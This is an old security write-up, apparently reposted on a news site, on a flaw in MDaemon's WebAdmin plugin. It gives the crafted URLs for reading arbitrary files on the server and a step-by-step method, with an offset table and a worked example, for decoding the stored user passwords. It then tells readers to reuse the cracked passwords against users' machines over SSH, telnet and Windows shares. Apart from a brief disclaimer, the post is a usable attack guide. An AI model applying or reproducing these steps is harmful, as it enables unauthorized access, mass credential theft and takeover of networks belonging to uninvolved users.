Howto crack the MDaemon password file manualy Mar, 24 2003 - 14:52 contributed by: hx Date: 17 March 2003 Subject: Postmaster has access to all files on MDaemon server. Subject2: Howto crack the MDaemon password file manualy. Author: Petur Ingi Egilsson (peter@germy.net) THIS FAQ MAY NOT BE USED ILLEGALY. ALL KNOWLEDGE YOU FIND IN HERE IS FOR DEMO & EDUCATION PURPOSE ONLY. I recently found a bug in WebAdmin (Web Administrator plugin for the MDaemon email enviroment), witch might allow the postmaster of the mailserver to take full control over the whole remote network + home computer of all users etc. Vunarable Systems: MDaemon with WebAdmin WebAdmin 2.0.1 Newer version have not been tested. Fix: Has not be released (17 March 2003). <cont> You must have access to the WEBADMIN with Administrator rights if you wish to exploit the system. Description: WebAdmin is running on custom verion of Apache. You can edit many config files who control the server. Example: -http://SERVER:WEBADMIN-PORT/WebAdmin.dll?Session=SESSION- ID&Theme=Standard&Program=MDaemon&Directory:Name=C%3A%5CMDaemon% 5CApp&File:Name=MDAEMON.INI&View=EditFile This little Url will allow you to read the MDAEMON.INI file, but that file is located in the c:\MDaemon\App\ directory on the server. You can NOT change this url, and let WebAdmin read for example c:\file.txt because the MDaemon.ini config file is a CONSTANT, witch means it is not expected to be renamed or located somewhere else. How ever, there are log file! They are often kept in alternitive location! Witch means their location may not be hold as a CONSTANT! LOG FILE URL: -http://SERVER:WEBADMIN-PORT/WebAdmin.dll?Session=SESSION- ID&Theme=Standard&Program=MDaemon&Directory:Name=C%3A%5CMDaemon% 5CLogs&File:Name=AccountPrune.log&View=ViewFile This means, you are able to change the URL so you will be able to read any file on the system. As long as it is NOT hidden. Now, let's change this to: http://SERVER:WEBADMIN-PORT/WebAdmin.dll? Session=SESSION- ID&Theme=Standard&Program=MDaemon&Directory:Name=DIRECTORY&File:Name=FILENA ME&View=ViewFile REMEMBER, to change the SERVER, WEBADMIN-PORT and the SESSION-ID so they match the one in your current URL. Change DIRECTORY to Any directory you want to. Here is the format for it %3A = : %5C = \ so c:\dirname\dir2 whuld be written like c%3A%5Cdirname%5cdir2 Change FILENAME to any file in the choosen directory. Now, what can be done? If the server holds a WebPage, you can read the .ASP .PHP .CGI scripts from the page. If the server has a DATABASE, you can view it as long as it is in text format! Now! What do we wish to do? Well, all users are dumb and keep the same pass for everything. Let's move on, and find the MDAEMON password file. Ofcourse it is encrypted, but lets' decript and view it! change DIRECTORY to C%3A%5CMDaemon%5CApp change FILENAME to userlist.dat Now you can see list of all users on the mailserver, including their full name + username + ENCRYPTED PASSWORD. <cout> Let's decrypt the password. Example, a user has the encripted password shown as : xMnIjdTT This is a BASE64 encoded password with 1byte offset for each character in the pass. Go and find a BASE64 decoder. [][http://www.isecurelabs.com/base64.php] When we DECODE xMnIjdTT we get ÄÉÈ�ÔÓ [<C4><C9><C8><8D><D4><D3> are the HEX values for each character] Now, we must remove the 1byte offset, to get the final resault. <b>Howto find out what 1byte offset is used by your version</b><i> To remove the 1byte offset, create a normal email account via webadmin, set the password as "aaaaaaaaaaaaaaa" Next, view the password file, you shuld see the encripted password, decript it using a Base64 decripter. Next, find the HEX value for each character in the password witch has 1byte offset. Then, next, you shuld use a HEX calculator, enter the HEX value for the char you have, and do "hex.of.char - 61" as 61 is the HEX code for a normal "a" char. This will leave you the offset for char nr.1, do it untill you have found the offset for all the 15 chars' in the password. Then make a list like the one below. Now, when you have found the offset, you are ready to decript the rest of the passwords in the file. </i> Here are the 1byte offset for version : MDaemon PRO v6.5.2 R Char HEX-Offset 1 54 2 68 3 65 4 20 5 73 6 65 7 74 8 75 9 70 10 20 11 70 12 72 13 6F 14 63 So, char 1 has offset of 54 in HEX! So, let's move on! HEX: <C4><C9><C8><8D><D4><D3> STRING WITH 1BYTE OFFSET: ÄÉÈ�ÔÓ S -H- O Ä <C4> 54 É <C9> 68 È <C8> 65 � <8D> 20 Ô <D4> 73 Ó <D3> 65 S: String with 1 byte offset H: Characters HEX Code O: Characters HEX OFFSET (see above table from 1-14) Now let's calculate! (All calculations are done with a HEXADEMICAL CALCULATOR) S -H- O Ä C4-54=70=(112 in decimal) = p É C9-68=61=(97 in decimal) = a È C8-65=63=(99 in decimal) = c � 8D-20=6D=(109 in decimal) = m Ô D4-73=61=(97 in decimal) = a Ó D3-65=6E=(110 in decimal) = n So, The password is "pacman". If your password file is large, and you crack it. You will get ALOT of passwords from your users. Who knows what kind of users you have. Administrators in your corperation who have ALOT more access to the network than you do, it is sure they have their little private email account on the mailserver as well. Decript their password and u might have access to the whole corperation network. As the mailserver keeps logs, you will be able to find the users IP addresses. Try port scanning them, and see if u will be able to enter their machines via ssh or telnet, using the user\pass they used on the mailserver. If they have Windows machine, try \\server-ip\c$ and write Administrator as username, then write their password as password. If you want access to their files and folders on the corperation server, write \\server-ip\ and then enter same user\pass as they use on the mail.server -from MDaemon

view all news